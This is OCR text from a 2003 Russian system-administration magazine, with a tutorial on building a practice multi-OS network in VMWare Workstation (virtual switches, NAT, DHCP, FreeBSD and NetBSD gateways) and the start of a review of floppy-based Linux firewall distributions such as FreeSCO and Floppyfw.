раз запускаем VMWare Workstation. Итак, можно себя по-
здравить: процедура установки успешно завершена.
Настало время усвоить еще немного теории. Посмот-
рим, как работает и из каких компонентов состоит подси-
стема, отвечающая за работу с сетями внутри VMWare
Workstation.
Виртуальный коммутатор (virtual switch) является ба-
зовой конструкцией, на основе которой мы будем строить
наши сети, и предназначен для тех же целей, что и обыч-
ный сетевой коммутатор, постоянно встречающийся нам в
реальном мире. С его помощью можно соединять между
собой все остальные сетевые объекты. Ответственность
за автоматическое создание коммутаторов, по мере того
как в них возникает надобность, возложена на VMWare
Workstation, поэтому нам о них беспокоиться не нужно. Сто-
ит помнить, что коммутаторов может быть не более девяти
штук, а значит, и сетей создать на их основе можно точно
такое же количество. Каждая сеть, созданная внутри вир-
туальной машины, получает стандартное имя VMnet и но-
мер, указывающий, на основе какого коммутатора она ра-
ботает. Таким образом, у нас возникает набор сетей с на-
званиями от VMnet1 до VMnet9. Количество сетевых адап-
теров, которые можно подключить к любому из вышепере-
численных коммутаторов, неограничено.
Мост (bridge) – устройство, позволяющее прозрачно
присоединить сетевой интерфейс любой виртуальной ма-
шины к локальной сети, в которой работает реальная ма-
шина. Виртуальный адаптер получает адрес из простран-
ства реальной сети, а для передачи и приема пакетов ис-
пользуется реальный сетевой адаптер. Таким образом,
всем машинам, находящимся в реальной сети, будет ка-
заться, что у реального компьютера появился еще один
сетевой интерфейс.
Виртуальный сетевой адаптер хоста (host virtual
adapter) создается для того, чтобы соединить гостевую и
основную операционные системы. Для этой цели на реаль-
ной машине организуется частная сеть класса C. В терми-
нологии VMWare Workstation подобные сети называются
(host-only network). В такую сеть входит виртуальный адап-
тер основной системы. Виртуальный адаптер основной си-
стемы нужно создать вручную через интерфейс управле-
ния сетями. И только затем можно будет добавлять в целе-
вую сеть адаптеры гостевых систем. Бояться утечки паке-
тов и проблем с безопасностью при использовании подоб-
ных сетевых адаптеров не стоит из-за того, что они не при-
соединены ни к одной из внешних реальных сетей.
Устройство NAT (Network Address Translation device) –
присоединяет виртуальный адаптер к существующему ре-
альному. Но в отличие от случая, в котором используется
мост, никаких новых интерфейсов в реальной сети не по-
 администрирование
является. Программное обеспечение NAT перехватывает На следующем экране показан диалог для добавле-
все проходящие пакеты и изменяет их так, чтобы систе- ния устройств типа мост. В нашем примере использовать
мы, находящиеся в реальной сети, считали, что общают- эту возможность мы не будем. Поэтому переходим к сле-
ся с реальным адаптером основной системы. При каж- дующей странице.
дом запросе, исходящем от виртуального адаптера, NAT
записывает запрос в специальную таблицу преобразова-
ний и открывает соединение с целевой системой, исполь-
зуя определенный диапазон портов реального интерфей-
са, и через него отправляет пакет. По приходу ответа,
опираясь на номер порта, NAT преобразует пакет к виду,
приемлемому для виртуальной сети, и отдает его вирту-
альному адаптеру, по запросу которого создавалось со-
единение. Таким образом, появляется возможность од-
новременной работы нескольких виртуальных адаптеров
через один реальный сетевой адрес.
DHCP-сервер (Dynamic host configuration protocol
server) – виртуальный сервер динамического конфигури-
рования узлов позволяет раздавать сетевые и админист-
ративные параметры централизованно для сетей на ос- Здесь мы видим список наших сетей. Надпись «Not
нове host-only и NAT. bridged» не настроена и на данный момент не может быть
Настал момент, когда нужно снова прекратить грызть использована.
гранит науки и опять начать практическую деятельность
по настройке макета наших виртуальных сетей.
Под Windows для выполнения этой задачи служит про-
грамма управления сетями «Virtual Network Editor». За-
пускаем ее, последовательно пройдя через меню Пуск →
Программы → VMWare Workstation → Manage virtual
networks. Того же результата можно добиться, если выб-
рать в работающей VMWare Workstation пункты меню Edit
→ Virtual Network Settings.

Далее идет список виртуальных сетевых адаптеров,

функционирующих в нашей системе. Судя по рисунку,
активированы адаптеры для сетей VMnet1 и VMnet8.

На первом экране видим суммарную статистику по

виртуальным сетям, созданным с настройками по умол-
чанию во время инсталляции VMWare Workstation. Итак,
судя по картинке, сеть VMnet0 зарезервирована для уст-
ройств типа мост. Таким образом, VMnet1 – это (host-only) Следующий снимок показывает интерфейс, позволя-
сеть 192.168.149.0 из адресного пространства, выделен- ющий управлять виртуальным DHCP-сервером. Как мы
ного для частных сетей. Ну и VMnet8 сеть 192.168.32.0 видим, он обслуживает сети 192.168.149.0 (VMnet1) и
соответственно служит для устройств NAT. 192.168.32.0 VMnet8.

№9(10), сентябрь 2003 15

 администрирование
Самый последний из показанных экранов демонстри-
рует возможности управления сервисом NAT, активиро-
ванным для сети VMnet8.
Для создания виртуальных сетей host-only и NAT исполь-
зуются сети класса C из адресного пространства, выде-
ленного для частных подсетей. Адреса таких сетей начи-
наются с 192.168.0.0 и продолжаются по 192.168.255.255
включительно. Выше по тексту мы обсуждали примене-
ние виртуального DHCP-сервера для раздачи адресов се-
тевым интерфейсам наших гостевых систем. Давайте по-
смотрим, как это работает, и в качестве примера будем
использовать схему адресации для вымышленной сети
192.168.13.0.
Òàáëèöà 1. Ðàñïðåäåëåíèå àäðåñîâ â ñåòÿõ òèïà host-only
Òàáëèöà 2. Ðàñïðåäåëåíèå àäðåñîâ â ñåòÿõ, èñïîëüçóþùèõ NAT
16
Разобравшись с теорией распределения адресов в вир-
туальных сетях, давайте посмотрим, как выглядит с точ-
ки зрения VMWare Workstation создаваемый нами макет
сети предприятия.
На первый взгляд схема сетевых взаимодействий выг-
лядит устрашающе сложно, но на самом деле это не так,
и через несколько минут вы будете с легкостью ориенти-
роваться в топологии наших сетей. Итак, на рисунке мы
видим все перечисленные ранее хосты и их интерфейсы.
Присмотревшись внимательно, легко разобраться в со-
ответствии между IP-адресами и интерфейсами. Далее
изображены три виртуальных коммутатора для сетей host-
only VMnet1 (192.168.40.0), VMnet2 (192.168.80.0), VMnet3
(192.168.120.0). Соответственно для работы с устройством
NAT (192.168.32.2) предназначена сеть VMnet8, для кото-
рой по умолчанию используется адресное пространство
192.168.32.0.
Также обратите внимание на тот факт, что виртуаль-
ные DHCP-сервера работают только в сетях VMnet2 и
VMnet8. Исходя из того факта, что в сетях VMnet1 и VMnet3
используются статические IP-адреса, DHCP-сервера этих
сетей отключены за ненадобностью.
Снова открываем программу управления нашими вир-
туальными сетями. Первым делом нужно изменить наст-
ройки сети VMnet1. По умолчанию она привязана к ад-
ресному пространству 192.168.149.0. По моему мнению,
такую комбинацию цифр неудобно запоминать, поэтому
мы исправим адрес VMnet1 на 192.168.40.0. Для этого вы-
бираем вкладку «Host Virtual Network Mapping» и нажима-
ем кнопку «…» напротив надписи VMnet1.

После этого активизируем вновь появившееся подме-
ню «Subnet».
Вносим данные о нашей сети 192.168.40.0, по умолча-
нию используется сетевая маска 255.255.255.0. Нажимаем
кнопку «OK» и вновь возвращаемся к интерфейсу управле-
ния сетями. Стоит крепко-накрепко запомнить, что после
внесения любых изменений необходимо каждый раз нажи-
мать кнопку «Применить», иначе ничего не произойдет.
Теперь переходим на вкладку DHCP и, выбрав запись,
указывающую что для сети VMnet1 включена раздача IP-ад-
ресов с помощью DHCP, нажимаем кнопку «Remove». И, как
всегда, для завершения щелкнем по кнопке «Применить».
После того как мы разобрались с сетью VMnet1, оста-
лось создать еще две сети VMnet2 и VMnet3. Снова воз-
вращаемся к вкладке «Host Virtual Network Mapping» и
опять жмем кнопку «…» напротив надписи VMnet2. Как
всегда, выбираем пункт меню «Subnet» и в появившемся
диалоговом окне вписываем 192.168.80.0. Как обычно, не
забываем уделить внимание кнопкам «OK» и «Приме-
нить». Пока что наша сеть не активирована, потому что в
основной системе нет виртуального адаптера, отвечаю-
щего за нее. Поэтому переходим на вкладку «Host Virtual
Adapters» и жмем кнопку «Add new adapter».
Проверяем, чтобы в выпадающем списке была выб-
рана сеть VMnet2, и снова жмем «OK».
№9(10), сентябрь 2003
администрирование
Не стоит расслабляться и считать работу выполнен-
ной после того, как в списке адаптеров появится над-
пись «New device». На самом деле новый адаптер еще
не создан.
Как всегда, используем по прямому назначению кноп-
ку «Применить», после этого ждем, пока система выйдет
из задумчивого состояния и обновит список адаптеров.
На экране должно появиться что-то похожее на следую-
щую картинку.
По умолчанию после того, как создан новый вирту-
альный адаптер, внутри только что налаженной сети на-
чинает работать DHCP-сервер. Вы можете в этом убе-
диться, выбрав вкладку «Host Virtual Network Mapping» и
нажав кнопку «…». Теперь в выпадающем меню появил-
ся добавочный пункт «DHCP». Если выбрать его, то в
ответ получим следующий диалог, позволяющий менять
настройки DHCP-сервера. Кстати, точно такого же эф-
фекта можно добиться, если нажать на вкладку DHCP
главного интерфейса, выбрать нужную сеть и использо-
вать кнопку «Properties». Все вышеописанные манипу-
ляции производились с целью показать, как легко и про-
сто можно менять опции DHCP, но так как в данном слу-
чае нас устраивают настройки по умолчанию, то изме-
нять мы ничего не станем.
В документации, поставляющейся вместе с VMWare
Workstation, говорится, что сети VMnet рекомендуется
строить на основе частных сетей класса C. Нигде не ска-
зано, что создавать сети других классов запрещено, и
поэтому я решил проверить, можно ли получить вирту-
альные сети класса B и С. В процессе создания сети все
идет нормально, и никакие ошибки на экране не появля-
ются. VMWare Workstation ни на что не жалуется, но ни
одна из свежесозданных сетей не работает. Повторив
свой неудачный эксперимент несколько раз, с сожале-
нием констатирую, что нам придется работать только с
сетями класса C.
Покончив с лирическими отступлениями, переходим к
созданию последней из необходимых нам сетей. Думаю,
читатель уже достаточно поднаторел в подобном ремес-
ле и сможет самостоятельно создать сеть VMnet3 с ад-
ресным пространством 192.168.120.0. По окончании про-
цесса желательно не забыть отключить DHCP для этой
сети. Впрочем, если вы этого не сделаете, то ничего
страшного не произойдет, но дизайн сети будет уже не
таким опрятным.
В вашей голове может возникнуть вопрос: «Если все
и так работает, зачем делать лишние движения?». Я счи-
таю, что все эти процедуры желательно выполнять, пото-
му что такой подход упрощает понимание механизмов
действия наших сетей. Посмотреть список виртуальных
адаптеров, появившихся внутри основной системы, мож-
но, пройдя через меню Пуск → Настройка → Сеть и уда-
ленный доступ к сети.
17
 администрирование

Нажав кнопку «Next», переходим к следующему шагу.

Ради удовлетворения собственного любопытства мо-
жете посмотреть опции любых адаптеров.
Мы не будем трогать настройки сети VMnet8, установ-
ленные по умолчанию, так как нас они вполне устраива-
ют. Вот теперь самое время приступить к созданию вир-
туальных машин.
Итак, запускаем VMWare Workstation и видим перед
собой что-то вроде этой картинки.
Теперь нужно выбрать, какой тип конфигурирования мы
будем использовать. По умолчанию используется опция
«Typical». Если выбрать ее, то VMWare Workstation без на-
шего участия решит, какой набор устройств стоит вклю-
чить в создаваемую виртуальную машину. Мне такой под-
ход не нравится, потому что я предпочитаю самостоятель-
но выбирать необходимые компоненты. А значит, нам нуж-
но использовать опцию «Custom».

Пришел черед выбрать операционную систему. Я ду-

маю, вы уже догадались, что нам нужна Windows 98.

Первым делом мы создадим машину с Windows 98 SE.

Вначале была опробована обычная версия Windows 98,
которая проинсталлировалась, как положено, с первого
раза. Но ни у меня, ни у кого-либо из знакомых лицен-
зий на неё не было. Поэтому пришлось снести ее и ис-
пользовать OEM-версию Windows 98, поставлявшуюся
с рабочими станциями для фирмы, в которой я сейчас
работаю. Кстати, стоит отметить, что пришлось перепро-
бовать несколько версий системы, поставлявшихся с
разными партиями оборудования. Из четырех вариантов
три подвисали на разных этапах установки. Видимо, дело
в том, что они рассчитаны на довольно-таки специфи-
ческое оборудование. После того как был найден дист-
рибутив, нормально работающий под виртуальной ма-
шиной, началась установка.
Итак, первым делом выбираем меню File → New →
New Virtual Machine.
В ответ получаем диалог помощника, который бу-
дет сопровождать нас в процессе создания новой вир- Далее определяем имя виртуальной машины и путь к
туальной машины. директории, где будут находиться все ее файлы.

18

На следующем шаге нужно решить, сколько оператив-
ной памяти будет доступно создаваемой виртуальной
машине. Судя по картинке, основная система располага-
ет 256 Мб оперативной памяти, из которых 192 Мб отдано
для нужд VMWare Workstation и работающих внутри нее
виртуальных машин. Автоматический помощник предла-
гает по умолчанию выделить вновь создаваемой системе
64 Мб, но я думаю, что и 32 Мб хватит с головой. Если уж
быть совсем жестоким, то можно поставить 16 Мб, но тогда
появится некоторое некритичное, но все же неприятное
замедление работы этой виртуальной машины. Стоит
обратить внимание, что размер выделяемой памяти дол-
жен быть обязательно кратен 4 Мб.
В ответ на наши действия, направленные на эконо-
мию ресурсов, система предупреждает нас о том, что
выбранный размер оперативной памяти существенно
меньше рекомендуемого, и это может привести к сни-
жению быстродействия. Мы с вами и так это знаем и
готовы пойти на такие маленькие жертвы. Поэтому не-
дрогнувшей рукой жмем «Yes».
Далее необходимо выбрать, к какому типу сетей бу-
дет относиться сетевой интерфейс создаваемой гостевой
системы. По умолчанию предлагается интерфейс мост
«Bridged Networking», но нас это не устраивает, так как
машина должна находиться в сети VMnet3. Если мне не
изменяет память, то эта сеть относится к классу host-only,
поэтому выбор очевиден.
№9(10), сентябрь 2003
администрирование
Наступило время решить, каким образом будут хранить-
ся данные, записываемые на жесткий диск виртуальной
машины. Опция «Create New Virtual Disk» приказывает со-
здать новый файл-хранилище для виртуального диска. За
ней идет «Use an existing Virtual Disk», позволяющая ис-
пользовать файл, созданный ранее. Например, такой файл
может остаться от другой виртуальной машины, которую
вы решили переустановить. Последняя опция «Use a
physical disk» дает нам возможность использовать в каче-
стве виртуального диска какой-либо раздел жесткого дис-
ка реальной машины. Эта опция довольно опасна, потому
что позволяет по неосторожности легко уничтожить дан-
ные в любом разделе реального жесткого диска. Выбира-
ем первую опцию и, как всегда, жмем «Далее».
Следующий экран позволяет определить размер в Гб
жесткого диска, выдаваемого гостевой системе. Я думаю,
что 0,5 Гб, или, проще говоря, 500 Мб, будет достаточно.
Следующая опция «Allocate all disk space now» позволяет
выделить все необходимое место сразу. Таким образом,
на жестком диске основной системы у нас появится файл
размером 500 Мб, заполненный нолями. Такой способ ра-
боты ускоряет выполнение операций записи на виртуаль-
ный диск из гостевой системы, но в то же время уменьша-
ет свободное место реального жесткого диска. В противо-
вес такому подходу можно выделять пространство внутри
виртуального диска динамически, в ответ на запросы гос-
тевой системы. Это будет слегка медленнее, зато вирту-
альная машина будет занимать гораздо меньше места на
19
 администрирование
жестком диске реальной системы. Я решаю использовать Выбираем пиктограмму сетевой карты и получаем
схему с динамическим распределением места. Последняя возможность редактировать ее параметры. Из ниспада-
из опций, доступных на этом экране, «Split disk into 2 GB ющего списка выбираем VMnet3 и снова жмем «OK».
files», позволяет разбить большой виртуальный диск на
файлы размером по 2 Гб. Таким образом, виртуальный диск
размером в 4,5 Гб на жестком диске реальной системы
будет представлен двумя файлами по 2 Гб и одним фай-
лом с размером 0,5 Гб. Эта возможность нужна, если фай-
ловая система основной операционки не поддерживает
файлы размером более 2 Гб. Эта опция нас также не инте-
ресует, поэтому оставляем ее нетронутой.

Немного передохнув, с воодушевлением приступаем

к установке операционной системы.
Для того, чтобы подать электропитание на нашу вир-
туальную машину, жмем клавишу с зеленой стрелкой и
смотрим, как происходит включение.

Далее нам предлагают придумать имя для файла, в ко-

тором будет храниться файловая система виртуальной
машины. Вариант по умолчанию отлично подходит для этих
целей. Поэтому жмем кнопку «Готово», завершая процесс
предварительной настройки виртуальной машины.
Надпись внизу экрана подсказывает нам о необходимос-
ти нажать клавишу «F2», чтобы войти в интерфейс управле-
ния BIOS. С радостью выполняем это действие и попадаем
внутрь самого что ни на есть настоящего BIOS. Инсталляцию
мы начнем с заранее припасенной загрузочной дискеты.

Интерфейс VMWare Workstation слегка изменился.

Кнопки управления стали активны, а правая и централь-
ная части экрана стали отображать данные о только что
созданной машине.

Теперь нужно перейти в раздел «Boot» и с помощью кла-

Для начала нам нужно настроить сетевой адаптер си-
стемы так, чтобы он находился в сети VMnet3. Для этого
используем меню Edit → Virtual Machine Settings.
виш «+» и «-» выставить список загрузочных устройств так,
как изображено на рисунке. После этого, воспользовавшись
меню «Exit», выходим с сохранением внесенных изменений.
Гостевая система снова начнет перезагрузку. После того как
загрузка с дискеты успешно завершилась, с помощью про-
граммы fdisk создаем основной раздел и делаем его актив-

20

ным. Для того, чтобы изменения вступили в силу, снова пе-
резагружаемся. Для этого можно использовать клавишу,
находящуюся на панели инструментов VMWare Workstation
и состоящую из двух разноцветных стрелок, обвивающихся
друг вокруг друга. После загрузки командой format c: разме-
чаем единственный раздел жесткого диска. Стоит отметить,
что загрузочная дискета, которой я пользуюсь, с помощью
драйвера mscdex самостоятельно подключает к системе CD-
ROM с дистрибутивом. По завершении процесса переходим
на диск D: и запускаем оттуда инсталляцию системы. Я ду-
маю, что каждый из вас много раз выполнял последователь-
ность действий, необходимых для успешной инсталляции
Windows, поэтому опускаю рутинные подробности. Пример-
но через 20 минут происходит первый запуск Windows. На
вашей машине этот временной промежуток может быть бо-
лее или менее продолжительным. Все зависит от скорости
реального жесткого диска. В процессе первой загрузки
Windows обнаружит следующие устройства: звуковую кар-
ту PCI Multimedia Audio Device, сетевой адаптер AMD PC Net
Family Ethernet (PCI-ISA) и стандартный видеоадаптер PCI
VGA. Для них будут автоматически подобраны наиболее под-
ходящие драйвера. Конечно, изображение на экране остав-
ляет желать лучшего, но нас это на данный момент не осо-
бенно интересует. Сейчас для нас самая главная задача –
настроить сетевую подсистему Windows. Открываем на-
стройки сетевой карты Windows и вносим туда вот такие
данные: IP-адрес 192.168.120.15 и маску сети 255.255.255.0:
В качестве шлюза по умолчанию устанавливаем адрес
192.168.120.2. После перезагрузки нужно будет проверить,
правильно ли применились сетевые параметры. Если все
произошло так, как мы хотели, то можно считать настрой-
ку этой машины оконченной. Для того, чтобы она не меша-
ла нам работать, ее можно выключить. Если выключать
желания нет, то можно применить более элегантный при-
ем. С помощью меню Power → Suspend или кнопки, состо-
ящей из двух желтых линий, можно перевести виртуаль-
ную машину в состояние глубокого сна. В таком режиме
она не будет использовать системные ресурсы. Все про-
граммы, выполнявшиеся внутри машины, будут останов-
лены и заморожены, их выполнение продолжится с того
же места, где они были остановлены, только после того,
как вы воспользуетесь меню Power → Resume или клави-
шей, включающей питание этой виртуальной машины.
№9(10), сентябрь 2003
администрирование
Завершив настройку Windows 98, переходим к настрой-
ке FreeBSD 4.7. Большинство действий, производимых
нами, будет схоже с предыдущим примером. Будем заос-
трять внимание только на отличиях. Итак, я создал вирту-
альную машину с жестким диском размером в 1 Гб диско-
вого пространства и 32 Мб оперативной памяти, если воз-
никнет надобность и желание что-либо менять, можете
отдать ей гораздо меньше ресурсов. На быстродействие
этой системы подобные изменения никак не повлияют.
Стоит также отметить, что для FreeBSD лучше выделить
все место сразу в файле виртуального диска. Как это
делать, мы обсуждали во время установки Windows. Если
этого не сделать, то посреди инсталляции вас может под-
жидать неприятность.
Видимо, в момент установки программного обеспече-
ния обмен с винчестером слишком интенсивен, и диско-
вая подсистема Windows не выдерживает такой нагруз-
ки. Кстати, под Linux такой ошибки я не встречал ни разу.
Перед запуском инсталляции в машину нужно доба-
вить еще две дополнительные сетевые карты. Как, навер-
ное, догадались самые любознательные читатели, мы сно-
ва воспользуемся меню Edit → Virtual Machine Settings.
Во-первых, убеждаемся, что первая сетевая карта привя-
зана к сети Vmnet1. После этого нажимаем кнопку «Add»,
затем в новом окне жмем «Далее». В следующем диало-
говом окне выбираем строку Ethernet Adapter и снова
жмем «Далее».
Стоит обязательно настроить все так, чтобы вновь
добавляемая карта была предназначена для сети
VMnet2. Жмем на кнопку «Готово». Как видите, проце-
дура добавления нового оборудования в систему доволь-
но проста. Самостоятельно добавляем еще одну карту с
привязкой к VMnet3. Стоит отметить, что внутри VMWare
Workstation стоит ограничение на количество сетевых
карт, которые можно добавить в одну машину. Ни одна
виртуальная машина не может иметь более трех сете-
21
 администрирование
вых карт. Завершив предварительные приготовления,
запускаем инсталляцию. Настраиваем BIOS так, чтобы
загрузка шла с CD-ROM, потому что дистрибутив систе-
мы у нас находится именно там. Я думаю, разметить диск
и инсталляцию FreeBSD вы сможете самостоятельно.
После того как система загрузилась первый раз, нам
нужно настроить сетевую подсистему. Сетевые интер-
фейсы, которые мы добавили в систему, называются
lnc0, lnc1 и lnc2 соответственно. Для того чтобы они за-
работали как положено, настраиваем систему с помо-
щью программы /stand/sysinstall или вручную вносим
следующие данные в файл rc.conf:

gateway_enable-"YES"
defaultrouter="192.168.40.57"
ifconfig_lnc0="inet 192.168.40.2 netmask 255.255.225.0"
ifconfig_lnc1="inet 192.168.80.2 netmask 255.255.225.0"
ifconfig_lnc2="inet 192.168.120.2 netmask 255.255.225.0"

Таким образом, мы разрешили прохождение пакетов

между всеми тремя интерфейсами и назначили шлюзом
по умолчанию машину NetBSD. Перезагружаем систему
для того, чтобы настройки вступили в силу.
Как только перезагрузка завершится, можно размо- Таким образом, мы разрешаем этой системе получать
розить машину Windows или запустить ее, если она у вас адрес от DHCP-сервера. И результат не заставит себя
еще не запущена. Как только Windows загрузится, выби- ждать. Находясь в командном интерпретаторе, выполня-
раем меню Пуск → Программы → Сеанс MS-DOS, в по- ем команду ipconfig /all.
явившемся окне командной оболочки пробуем выполнять
по очереди нижеследующие команды.

ping 192.168.120.2
ping 192.168.80.2
ping 192.168.40.2

Все команды должны показать, что ICMP-пакеты до-

стигли цели и благополучно вернулись назад. Итак, пе-
реходим к следующей машине, которая будет выступать
у нас в роли веб-сервера. На нее нам предстоит устано-
вить Linux Mandrake. Как и в случае FreeBSD, установка
у нас происходит с CD-ROM. Этой машине мы выделяем
1 Гб пространства жесткого диска и 64 Мб оперативной
памяти. Сетевой адаптер у нас один, и он принадлежит
к сети VMnet1, я надеюсь, вы сможете сделать так, что-
бы это соответствовало истине, самостоятельно. За счет
использования графической оболочки процесс инстал-
ляции проходит совершенно безболезненно. Главное –
не забыть заказать инсталляцию веб-сервера apache.
Под конец установки дать системе IP-адрес 192.168.40.32
и назначить шлюзом по умолчанию IP 192.168.40.2, при-
надлежащий машине FreeBSD. В остальном все выгля-
дит довольно прозрачно.
Следующим нашим пациентом становится машина на
основе OEM версии Windows 2000 Professional. Как вы
уже догадались, ничего нетипичного здесь нет. Инстал-
ляция выполняется с загрузочного CD-ROM. Для работы
этой машины выделен 1 Гб жесткого диска и 64 Мб опе-
ративной памяти. Изюминкой, ради которой была затея-
на возня с этой машиной, является работа с DHCP. После
того как инсталляция Windows 2000 будет окончена, нуж-
но настроить свойства протокола TCP/IP так, как показа-
но на рисунке.
Должны получиться именно такие сведения о парамет-
рах сетевого адаптера. С помощью команды ping прове-
ряем доступность всех работающих в нашей сети хостов.
Теперь самое время перейти к нашей последней и, воз-
можно, самой интересной инсталляции. Сейчас мы созда-
дим машину на основе NetBSD, которая будет служить для
нас шлюзом в Интернет. Интересные моменты начинают-
ся практически сразу после начала создания виртуальной
машины. NetBSD нет в списке официально поддерживае-
мых VMWare Workstation систем, поэтому во время выбора
типа системы мы будем использовать опцию «Other». Вы-
деляем 300 Мб свободного пространства на жестком дис-
ке и 32 Мб оперативной памяти. Для такой маленькой сис-
темы, как NetBSD, этого будет вполне достаточно. Как вся-
кому порядочному шлюзу между сетями, даем две сете-
вые карты: первая из них смотрит в VMNet1 и имеет адрес
192.168.40.57, а вторая получает адрес 192.168.32.128 и
направлена в сторону VMNet8. Также в этой сети по адре-
су 192.168.32.2 находится устройство NAT. Я надеюсь, вы
сможете самостоятельно добавить устройства этих сете-

22

вых карт в виртуальную машину. Инсталляцию мы будем
проводить не с CD-ROM, а с его iso-образа. Согласитесь,
довольно полезная возможность, если вы скачали образ
диска из Интернета, а под рукой нет пишущего CD-ROM.
Итак, чтобы пристыковать образ как диск CD-ROM, нужно
сделать следующее. Настраиваем в BIOS загрузку с CD-
ROM, затем в списке оборудования выбираем этот самый
CD-ROM. Изменяем его свойства так, чтобы стала актив-
на опция «Use ISO Image», затем с помощью кнопки
«Browse» выбираем необходимый файл образа.
Поскольку для связи с внешним миром NetBSD будет
использовать NAT, нужно немного подправить настройки
сети VMnet8. Как обычно, для этих целей используем ре-
дактор сетей VMWare Workstation. Выбираем вкладку NAT,
убеждаемся, что выбрана именно VMnet8, и жмем клави-
шу «Edit», в ответ открывается диалог настроек NAT. Нам
нужно идти глубже, поэтому жмем на клавишу «Port
forwarding». Появляется еще одно окно, разделенное на
два окна поменьше, верхняя часть отвечает за проброс
№9(10), сентябрь 2003
администрирование
внутрь сети входящих TCP-пакетов, а нижняя соответ-
ственно UDP. Нам нужно настроить TCP, поэтому исполь-
зуем кнопку «Add» верхнего окна.
Настраиваем проброс так, чтобы все входящие пакеты с
порта 80 попадали на порт 80 веб-сервера. Несколько раз
жмем кнопку «OK» и затем один раз кнопку «Применить».
Вот теперь можно начинать установку NetBSD. Обо-
лочка инсталлятора очень похожа на оболочку FreeBSD,
поэтому, я думаю, проблем с ней возникнуть не должно.
Главное – не забыть настроить сетевую карту, смотря-
щую в сеть VMnet1 на адрес 192.168.40.57. Вторая карта
будет получать параметры своих настроек от сервера
DHCP, работающего в сети VMnet8. Кстати, стоит отме-
тить, что шлюзом по умолчанию для второй карты будет
адрес устройства NAT.
По окончании установки и настройки NetBSD все наши
подопытные сети смогут ходить в Интернет, а также
пользоваться услугами внутреннего веб-сервера. А кли-
енты из внешних сетей будут видеть веб-сервер на 80-м
порту сетевого адаптера нашей реальной машины.
В результате при заходе на веб-сервер из любой сети
должна получаться вот такая картинка.
В данной статье намеренно не описываются никакие
меры по обеспечению безопасности вновь созданных се-
тей, потому что эта тема выходит далеко за рамки пове-
ствования. Не стоит пытаться объять необъятное.
Во второй части этой статьи мы поговорим об инстал-
ляции VMWare Workstation под Linux. И о том, как сделать
точно такой же макет тренировочной сети под вышеназ-
ванной операционной системой.
23
администрирование

Маленький Linux
в качестве firewall

СЕРГЕЙ ЯРЕМЧУК

24

Со временем устаревает любая техника, в том числе оно
не считается и с компьютерами. Выпущенные буквально
год назад считаются уже устаревшими. А что делать с
компьютерами, которым уже «далеко за»? Выбрасывать-
то жалко. Иногда их фирма продает по дешевке, компен-
сируя покупку новых машин. Но на их плечи можно пере-
ложить маленькие задачи, разгрузив таким образом бо-
лее мощные системы. Так, их можно запросто настроить
как роутер и/или firewall, использовать в качестве бездис-
ковых рабочих станций и Х-терминалов, отдельных
пользовательских машин и даже возложить на них мони-
торинг, аудит и детектирование вторжения в компьютер-
ную сеть. Сегодня предлагаю познакомиться с дистрибу-
тивами, которые позволяют настроить совместный дос-
туп в Интернет, среди дополнительных возможностей не-
которые имеют firewall, NAT, кеширующий DNS-сервер,
сервер DHCP, ftp- и www-серверы. В более продвинутых
решениях встречается даже возможность создания вир-
туальных частных сетей VPN. Для большинства из рас-
сматриваемых дистрибутивов наличие жесткого диска
тоже необязательно. Некоторые помещаются на одну дис-
кету, обеспечивая только необходимый минимум, более
оснащенные варианты требуют уже наличия СD-ROM для
своего запуска или установки.
Начнем, наверное, с любимчика. Это был один из пер-
вых дистрибутивов подобного направления, с которым
мне пришлось столкнуться и который показал всю живу-
Ðèñóíîê 1.
№9(10), сентябрь 2003
администрирование
честь такой идеи, и что самое интересное, на первона-
чальное знакомство и настройку ушло всего минут двад-
цать, так что такой вариант может быть использован в
экстренных случаях, когда вышел из строя основной мар-
шрутизатор. Итак, FreeSCO http://www.freesco.org (назва-
ние пошло от Free ciSCO router). При таких маленьких раз-
мерах, всего одна дискета, этот дистрибутив умеет до-
вольно многое: обеспечивает одновременную поддержку
до 3 ethernet/arcnet/token_ring/arlan сетевых карточек и до
2 модемов (большинство нижеописываемых поддержива-
ют только два сетевых устройства), режим моста,
firewalling (для защиты внутренней сети от несанкциони-
рованного доступа из Интернета или ограничения досту-
па в Интернет для внутренних пользователей), NAT (транс-
ляция сетевого адреса для коллективного доступа в сеть),
сервер DNS, DHCP-сервер для динамического выделения
адресов, HTTP-сервер (для удаленного администрирова-
ния через веб-интерфейс – рис.1, 1а), telnet-сервер (для
удаленного управления системой – рис.1б), print-cервер
и TIME-cервер (в комплекте есть и графический клиент
для Windows). Системные требования также невысоки:
процессор от i386, 6 Мб ОЗУ (рекомендовано 16 Mб). Под-
держиваются большинство сетевых карт (полный список
совместимых с дистрибутивом смотрите на сайте; соот-
ветствующий драйвер, если что-то не получается, просто
положите в a:\router\drv). Модемы в принципе любые, кро-
ме, наверное, win-модемов. FreeSCO очень просто уста-
25
 администрирование
Ðèñóíîê 1à.
навливать и настраивать. После перезагрузки в строке
приглашения введите setup и отвечайте на вопросы. Зе-
леным цветом выделены вопросы, которые необходимо
обязательно настроить, желтым – опциональные, а крас-
ные вопросы для тех, кто в состоянии разобраться в том,
что делает. Вводя номер телефона провайдера, при то-
новом наборе набейте перед номером букву Т, при им-
пульсном – Р, если вы используете мини-АТС, введите
символ W, например Т9W2798007. Используется два па-
роля: root и администратора (для удаленной настройки
через веб-интерфейс, 82 порт по умолчанию). И еще одно
удобство реализовано во FreeSCO, хотя все установки при
выключении сохраняются на дискете, его можно устано-
вить на жесткий диск, для этого вместо setup введите
mv2hd. Жесткий диск должен быть отформатирован как
FAT16 или FAT32. После перезагрузки введите setup и
делайте все, как описано выше (дискету перед этим, ес-
тественно, необходимо удалить). Затем можно доустано-
вить необходимые для работы программы, скомпилиро-
вав их предварительно в другом дистрибутиве. При таких
размерах это просто супер.
Floppyfw (http://www.zelow.no/floppyfw/index.html) крат-
ко можно охарактеризовать как маршрутизатор с расши-
ренными возможностями firewall, который размещается и
работает с одного диска. Поддерживаются списки досту-
па, IP-masquerading или NAT (Network Address Translation),
маршрутизация пакетов. Системные требования также не-
26
высоки – 386sx или лучше 12 Мб ОЗУ (при меньшем объе-
ме можно использовать более раннюю версию, которая
есть на сайте). Очень простая система пакетов, которую
можно использовать для добавления необходимых при-
ложений: редакторов, PPP, VPN и пр. Поддерживается ре-
гистрация событий при помощи klogd/syslogd, локальное
и удаленное управление, имеются серверы DHCP и ке-
ширующий DNS для внутренних сетей. Образ сохраняет-
ся на дискете с файловой системой FAT, что позволяет
очень просто редактировать необходимые параметры в
Windows или DOS, на свободное место, оставшееся на
дискете, можно добавить пару своих приложений, в том
